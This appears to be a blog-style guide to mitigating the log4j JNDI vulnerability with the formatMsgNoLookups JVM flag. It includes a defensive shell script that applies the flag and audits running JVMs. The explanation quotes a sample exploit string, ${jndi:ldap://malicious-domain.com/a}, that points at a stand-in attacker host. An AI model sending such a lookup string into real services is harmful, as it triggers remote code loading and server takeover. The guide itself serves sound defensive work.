Quick fix for log4j vulnerability using environment variables

The attack surface for the log4j vulnerability is quite large.
Check out https://github.com/YfryTchsGD/Log4jAttackSurface

Log4j is an open source Apache logging framework that is used in many applications. By default, when log4j logs request data, the URLs contained in it are processed by the logging framework via the "Java Naming and Directory Interface (JNDI)". That means a hacker can easily send a malicious request that results in ${jndi:ldap://malicious-domain.com/a} appearing in the logs, where malicious-domain.com is controlled by the hacker. The vulnerability is triggered when log4j automatically makes a request to malicious-domain.com via JNDI. The response from the hacker-controlled domain contains a remote Java class file, which is injected into the server process that runs the logging framework and can execute arbitrary code.

How to fix

The easiest fix is to turn off log4j's default behaviour of processing URL lookups in log messages.

Luckily, log4j has a configuration option that accomplishes exactly this: the log4j2.formatMsgNoLookups system property, set to true.


In many Java-based web apps, Java options are controlled by environment variables. That means you can easily add the above configuration option to the startup script of your Java apps.

For example:



export JAVA_OPTS="-Dlog4j2.formatMsgNoLookups=true"

or, for Windows-based apps:

set EXTRA_JAVA_OPTS=-Dlog4j2.formatMsgNoLookups=true
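
An added example, not part of the original post: the export line above replaces whatever JAVA_OPTS already held, so this script appends the flag idempotently and checks JVM command lines for it. The function names, the --apply/--audit switches and the /proc-based audit (Linux only) are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the original post. Assumes options are
# whitespace-separated with no quoted spaces inside a single option.
FLAG_KEY='-Dlog4j2.formatMsgNoLookups'
FLAG="${FLAG_KEY}=true"

# Print $1 with every existing copy of the flag removed and one "=true" copy
# appended, so existing options (heap size etc.) survive and the result is
# the same no matter how often the startup script runs.
ensure_no_lookups() (
    set -f                      # no glob expansion of e.g. "-cp lib/*"
    out=''
    for opt in $1; do
        case "$opt" in
            "$FLAG_KEY"|"$FLAG_KEY="*) ;;
            *) out="${out:+$out }$opt" ;;
        esac
    done
    printf '%s\n' "${out:+$out }$FLAG"
)

# Exit 0 only if the command line in $1 ends up with the flag set to true.
# Assumption: when the flag is repeated, the last occurrence wins.
has_no_lookups() (
    set -f
    state=1
    for opt in $1; do
        case "$opt" in
            "$FLAG") state=0 ;;
            "$FLAG_KEY"|"$FLAG_KEY="*) state=1 ;;
        esac
    done
    exit "$state"
)

# Linux only: print the PID of each running java process without the flag.
audit_running_jvms() {
    for f in /proc/[0-9]*/cmdline; do
        [ -r "$f" ] || continue
        cmd=$(tr '\000' ' ' < "$f" 2>/dev/null) || continue
        case "$cmd" in
            java\ *|*/java\ *)
                has_no_lookups "$cmd" || { pid=${f#/proc/}; echo "no flag: pid ${pid%/cmdline}"; } ;;
        esac
    done
}

case "${1:-}" in
    --audit) audit_running_jvms ;;
    --apply) ensure_no_lookups "${JAVA_OPTS:-}" ;;
esac
```

In a startup script, source the functions and use JAVA_OPTS=$(ensure_no_lookups "$JAVA_OPTS"); export JAVA_OPTS. The audit only sees flags passed on the command line and does not tell you whether the log4j version loaded by the app honours the property.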